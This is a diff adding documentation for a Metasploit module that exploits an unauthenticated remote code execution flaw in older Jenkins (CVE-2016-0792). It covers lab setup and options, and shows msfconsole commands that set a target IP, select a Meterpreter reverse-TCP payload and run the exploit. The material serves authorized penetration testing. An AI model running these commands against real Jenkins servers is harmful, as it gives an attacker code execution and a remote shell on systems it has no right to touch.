|
| 1 | +Jenkins XStream Groovy classpath Deserialization Vulnerability (CVE-2016-0792) |
| 2 | + |
| 3 | +This module exploits a vulnerability in Jenkins versions older than 1.650 and Jenkins LTS versions older than 1.642.2 which is caused by unsafe deserialization in XStream with Groovy in the classpath, which allows remote arbitrary code execution. The issue affects default installations. Authentication is not required to exploit the vulnerability. |
| 4 | + |
| 5 | +## Vulnerable Application |
| 6 | + |
| 7 | +Jenkins versions < 1.650 and Jenkins LTS versions < 1.642.2 |
| 8 | + |
| 9 | +Download Jenkins (Windows) < version 1.650 from here: |
| 10 | +http://mirrors.jenkins-ci.org/windows/ |
| 11 | + |
| 12 | +Windows Installation: Double click .msi |
| 13 | + |
| 14 | +Download Jenkins LTS (Debian) < version 1.642.2 from here: |
| 15 | +https://pkg.jenkins.io/debian-stable/ |
| 16 | + |
| 17 | +Download Jenkins (Debian) < version 1.650 from here: |
| 18 | +https://pkg.jenkins.io/debian/ |
| 19 | + |
| 20 | +Debian Installation: `sudo dpkg --install jenkins_1.642.1_all.deb` |
| 21 | + |
| 22 | +## Options |
| 23 | + |
| 24 | +**TARGETURI** |
| 25 | + |
| 26 | +The base path to Jenkins application `/` by default |
| 27 | + |
| 28 | +**VHOST** |
| 29 | + |
| 30 | +The HTTP server virtual host. You may need to configure this as well, even though it is set as optional. |
| 31 | + |
| 32 | +**The Check Command** |
| 33 | + |
| 34 | +The `jenkins_xstream_deserialize` module comes with a check command that can attempt to check if the remote host is vulnerable or not. To use this, configure the msfconsole similar to the following: |
| 35 | + |
| 36 | +Note: The check only uses `appears to be vulnerable` because it is not possible to differentiate from HTTP headers which Jenkins line (Weekly or LTS) is running. |
| 37 | + |
| 38 | +``` |
| 39 | +set RHOST [IP] |
| 40 | +
|
| 41 | +set TARGETURI [path to Jenkins] |
| 42 | +``` |
| 43 | + |
| 44 | +``` |
| 45 | +msf exploit(jenkins_xstream_deserialize) > check |
| 46 | +
|
| 47 | +[*] 192.168.1.64:8080 The target appears to be vulnerable.. |
| 48 | +``` |
| 49 | + |
| 50 | +**Exploiting the Host** |
| 51 | + |
| 52 | +After identifying the vulnerability on the target machine, you can try to exploit it. Be sure to set TARGETURI to the correct URI for your application, and the TARGET variable for the appropriate host OS. |
| 53 | + |
| 54 | +``` |
| 55 | +msf exploit(jenkins_xstream_deserialize) > set RHOST 192.168.1.37 |
| 56 | +RHOST => 192.168.1.37 |
| 57 | +msf exploit(jenkins_xstream_deserialize) > set target 3 |
| 58 | +target => 3 |
| 59 | +msf exploit(jenkins_xstream_deserialize) > set payload windows/x64/meterpreter/reverse_tcp |
| 60 | +payload => windows/x64/meterpreter/reverse_tcp |
| 61 | +msf exploit(jenkins_xstream_deserialize) > exploit |
| 62 | +``` |
0 commit comments